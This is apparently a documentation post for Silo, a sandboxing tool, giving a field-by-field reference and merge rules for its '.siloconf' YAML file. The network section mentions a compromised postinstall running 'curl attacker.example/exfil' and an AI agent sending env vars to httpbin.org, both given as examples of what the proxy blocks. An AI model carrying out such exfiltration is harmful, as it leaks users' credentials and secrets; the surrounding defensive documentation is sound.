Understanding .siloconf: where it lives, how it merges, what every field does
A complete reference for Silo's project config file — what belongs in it, what belongs in ~/.silo/siloconf, and the full set of fields with worked examples.
Almost everything Silo does reads from a .siloconf file somewhere. Which project is this? What tools does it need? What env vars can leak into the sandbox? Can npm reach the internet? Which ports?
This post is the complete reference.
What it is, in one paragraph
A .siloconf is a YAML file that describes a project’s Silo environment. It’s the equivalent of .tool-versions (asdf) + .env.example + package.json > engines + your firewall rules, all in one place. It’s checked into git. It travels with the repo. When a teammate clones the project and runs silo sync, they get the same tools, same versions, same networking posture you do.
Where to put it
Silo looks for config in three places, in order of increasing specificity:
Tool defaults (registry.yaml, baked into the binary)
↓ overridden by
~/.silo/siloconf (global / user-level — optional)
↓ overridden by
.siloconf (project root — walk-up from cwd)
The first match per field wins. Merging happens key by key, not file by file — you can set passEnv globally and overrides.python.ports in the project, and both apply.
.siloconf (project-level)
Drop it at the root of your repo, next to your .git directory or package.json. Silo walks up from your current working directory to find it, so cd src/ and silo run python both see the same config.
Commit this file. It’s the project’s Silo manifest; a teammate’s silo sync relies on it.
~/.silo/siloconf (user/global-level)
Same format, applies when no project config exists, or merges under it. Put personal preferences here — PYTHONDONTWRITEBYTECODE, a tighter-than-default network allowlist, extra cache. Nothing project-specific.
Don’t commit this file. It’s yours.
Tool-level defaults
Registry defaults in internal/tools/registry.yaml set sensible baselines: image, shims, cache mounts, resource limits. You rarely look at these directly. Override specific fields via overrides.<tool>.* in .siloconf.
A complete example
# .siloconf
tools: [python, node]
passEnv:
- GITHUB_TOKEN
- DATABASE_URL
- ANTHROPIC_API_KEY
passFiles:
- .npmrc
- .pypirc
mount:
exclude:
- node_modules
- .venv
- __pycache__
- .next
overrides:
node:
image: docker.io/library/node:20-slim
network:
hostAccess: true
proxy:
allow:
- registry.npmjs.org
- "*.npmjs.org"
- "*.github.com"
ports:
- host: 3000
guest: 3000
- host: 5173
guest: 5173
python:
image: docker.io/library/python:3.11-slim
env:
PYTHONPATH: /workspace/src
PYTHONDONTWRITEBYTECODE: "1"
network:
hostAccess: true
proxy:
allow:
- pypi.org
- "*.pythonhosted.org"
cache:
rootfs:
maxSizeMB: 16384 # this repo is big, let it use more cache
maxAgeDays: 90
Every top-level key is optional. A one-tool project only needs a few lines.
Field reference
tools
tools: [python, node]
The set of tools this project expects to have installed. silo sync reads this list, installs anything missing, and warms the rootfs cache for each.
Implicit addition: the keys of overrides: also count. Writing overrides.rust: means this project also needs rust, even if it’s not in tools:.
Omit this whole key and Silo won’t stop you from running anything — it just can’t run silo sync meaningfully.
passEnv
passEnv:
- GITHUB_TOKEN
- DATABASE_URL
Whitelist of host env vars forwarded into the sandbox. Everything else is dropped.
This is the sharpest knife in the file. The default is “nothing is passed” — which means a compromised package or a runaway AI agent cannot read your AWS_SECRET_ACCESS_KEY unless you deliberately named it here.
passFiles
passFiles:
- .npmrc
- .pypirc
- ~/.gitconfig
Host files mounted read-only into the VM. Paths with ~ are expanded against the user’s home.
Use this when a tool wants a config file you can’t easily pass as env — npm auth tokens in .npmrc, pypi auth in .pypirc, ssh-style git config, and so on. Read-only by design, so a misbehaving process in the VM can’t corrupt your host file.
mount
mount:
exclude:
- node_modules
- .venv
- __pycache__
- .next
- target # cargo
- dist
The project directory is mounted read-write at /workspace/ by default. mount.exclude hides subdirectories from the mount — inside the VM, they don’t exist on the host mount.
Why exclude? Two reasons:
- Performance. Cross-VFS mounts on macOS are slower than native filesystems for workloads with hundreds of thousands of small files (
node_modules, large Python caches). Excluding them makes the VM put them on its own ext4 rootfs instead. - Cleanliness. If you bake deps into the VM with
silo build, you don’t want the hostnode_modules/shadowing the VM one.
Without any exclusion, everything under the project directory is visible inside the VM.
overrides.<tool>.image
overrides:
python:
image: docker.io/library/python:3.11-slim
Replaces the tool’s default OCI image for this project. Any registry + tag that OCI accepts works — official images, distroless, your own mirror, a private registry tag.
This is how version pinning works:
silo use python@3.11writes this field automatically.- You can edit it by hand for tags that aren’t in the built-in registry (alpine, distroless, a company-internal version).
overrides.<tool>.env
overrides:
python:
env:
PYTHONPATH: /workspace/src
PYTHONDONTWRITEBYTECODE: "1"
DATABASE_URL: postgres://host.silo.internal:5432/myapp
Static env vars set inside the VM when this tool runs. Unlike passEnv, these don’t come from the host — they’re literal values defined right here.
Good for:
- Pointing Python at your source layout (
PYTHONPATH). - Opting Node into a specific mode (
NODE_ENV=development). - Telling the tool how to reach the host (
host.silo.internalis the hostname of the Mac from inside the VM).
passEnv vs env: passEnv forwards what’s already in your shell; env sets values from scratch in config.
overrides.<tool>.network
The network block is opt-in. By default a tool has no network access.
overrides:
node:
network:
hostAccess: true
proxy:
allow:
- registry.npmjs.org
- "*.github.com"
deny:
- "*"
hostAccess: true — enables outbound networking at all. Without it, the VM has no route to the outside world. Also exposes the host as host.silo.internal inside the VM (useful for hitting your local Postgres, Redis, or a dev API).
proxy.allow — a list of domains the VM is allowed to reach. Wildcards supported (*.npmjs.org). HTTP/HTTPS requests to anything not in the allow-list are blocked by an in-VM proxy.
proxy.deny — explicit deny list. Rarely useful on its own; the default is already “deny everything not in allow.” Use it to carve holes in a wildcard (e.g. allow *.github.com but deny evil.github.com).
The allowlist is the whole point of the file. A compromised postinstall can try to curl attacker.example/exfil all it wants — the proxy simply returns “no.” Same for a hallucinated “send my env vars to httpbin.org” from an AI agent.
overrides.<tool>.ports
overrides:
node:
ports:
- host: 3000
guest: 3000
- host: 5173
guest: 5173
Forwards host ports to guest ports. Your dev server at 0.0.0.0:3000 inside the VM becomes reachable at localhost:3000 on the host.
Declaring ports implicitly sets hostAccess: true — you can’t serve traffic without networking.
Shorthand from the CLI: silo config ports add node 3000:3000.
What you can’t override from .siloconf
Registry-level fields — cpus, memoryMB, rootfsSizeMB, requires, shims, cache (the per-tool bind-mount list, not the GC policy block below), workdir, lsp — are baked into the tool’s built-in definition in internal/tools/registry.yaml. The overrides.<tool>.* surface only accepts four keys: image, env, network, ports. Other fields are silently ignored by the parser.
If you need a bigger rootfs or a different dependency graph, the current answer is to edit the registry (or your own fork) and silo install --force; a richer project-level override surface is tracked as an open issue.
cache
cache:
rootfs:
maxSizeMB: 8192 # LRU cap (default)
maxAgeDays: 60 # stale-entry cutoff (default)
tools:
maxSizeMB: 4096 # per-tool cache cap
maxAgeDays: 30
perMount:
rust/cargo: 8192 # override for one specific cache mount
Configures disk reclamation policy. Auto-GC runs once per process at the top of every silo run, so these caps quietly shape how much disk Silo holds onto.
In project .siloconf: useful if this project is unusually big (bump) or unusually small (tighten). In ~/.silo/siloconf: sets your personal default across every project.
See silo cache report, silo cache list, silo cache gc for inspecting and forcing reclamation.
Merge behavior in detail
Two files, one example:
# ~/.silo/siloconf (global)
passEnv:
- SENTRY_DSN
overrides:
python:
env:
PYTHONDONTWRITEBYTECODE: "1"
# .siloconf (project)
tools: [python]
passEnv:
- GITHUB_TOKEN
overrides:
python:
image: docker.io/library/python:3.11-slim
env:
PYTHONPATH: /workspace/src
Effective config:
tools: [python]
# Both lists union — neither overrides the other
passEnv:
- SENTRY_DSN
- GITHUB_TOKEN
overrides:
python:
image: docker.io/library/python:3.11-slim # project wins (only defined there)
env:
PYTHONDONTWRITEBYTECODE: "1" # global value kept
PYTHONPATH: /workspace/src # project value added
Rules per key (from MergeOver in internal/config/project.go):
| Key | Merge behavior |
|---|---|
tools, passEnv, passFiles | Dedup-union (order preserved) |
mount (whole block, including exclude) | Replace — project wins if set, else global |
cache (whole block) | Replace — project wins if set, else global |
overrides.<tool>.image | Replace scalar (project wins if set) |
overrides.<tool>.env | Deep-merge per key (project keys win on conflict) |
overrides.<tool>.network | Replace whole network block, including proxy.allow/deny |
overrides.<tool>.ports | Replace whole list |
Watch out for mount.exclude: it is not unioned. If your global ~/.silo/siloconf sets mount.exclude: [node_modules] and the project sets mount.exclude: [.venv], the effective value is [.venv] — the whole mount block is replaced. Re-list anything you need to keep.
Same goes for network.proxy.allow — a per-tool network block in the project replaces the global one for that tool. If you want layered allowlists today, keep them in one place.
Verify the result:
silo config show
It prints the merged config as YAML, exactly the same shape you’d write by hand.
How to start
- One tool, defaults: you can skip
.siloconfentirely and justsilo install python. A project-free flow works for scratch scripts. - One tool, needs network: three lines are usually enough.
overrides: node: network: hostAccess: true proxy: allow: [registry.npmjs.org, "*.npmjs.org"] - Anything serious: run
silo init. It auto-detects tools from marker files (package.json,requirements.txt,Cargo.toml,go.mod,deno.json), asks a few questions, and writes.siloconf. Edit from there.
Why this file exists at all
It comes back to blast radius. The unit of blast radius for Silo is a single run — so the unit of policy has to be a single run too. Which means policy has to live somewhere the runner can find it without you remembering to pass flags. Walk-up discovery of .siloconf is how that works.
The alternative — every silo run takes a dozen flags — would mean every shim invocation, every python you type, every npm install on autopilot, would have to thread policy through by hand. Nobody would do it. The project config file is the thing that makes “good defaults per repo” actually work in practice.
Where to go next
- Python with Silo — the Python-specific shape of
.siloconf. - Node.js with Silo — the Node-specific shape of
.siloconf. - Getting started — if you haven’t installed yet.